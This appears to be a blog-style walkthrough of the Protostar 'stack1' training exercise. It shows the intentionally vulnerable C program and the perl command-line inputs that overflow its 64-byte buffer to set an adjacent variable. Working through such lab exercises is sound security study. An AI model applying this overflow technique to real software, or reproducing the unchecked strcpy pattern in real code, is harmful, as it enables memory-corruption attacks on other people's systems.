Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack1 1
Try again, you got 0x00000000

Exploit

Make the program respond with the message “you have correctly got the variable to the right value”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 if(argc == 1) {
 errx(1, "please specify an argument\n");
 }

 modified = 0;
 strcpy(buffer, argv[1]);

 if(modified == 0x61626364) {
 printf("you have correctly got the variable to the right value\n");
 } else {
 printf("Try again, you got 0x%08x\n", modified);
 }
}

We can see the challenge statement will be displayed if the ‘modified’ variable is equal to the hex value “0x61626364”.

First of we have to use the same trick from challenge stack0 and corrupt the memory stack using the “argv[1]’ variable which gets pasted to strcpy() call and overwrite the “modified” variable but this time we need to overwrite with asci characters “dcba”=0x64636261, reverse order.

Let’s see

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x65'`
Try again, you got 0x00000041

Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.

We appear to have hit one byte of modified with 0x41=A.

With some experimenting we are able to get the desired modified key.

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x64 . "dcba"'`
you have correctly got the variable to the right value

Thank you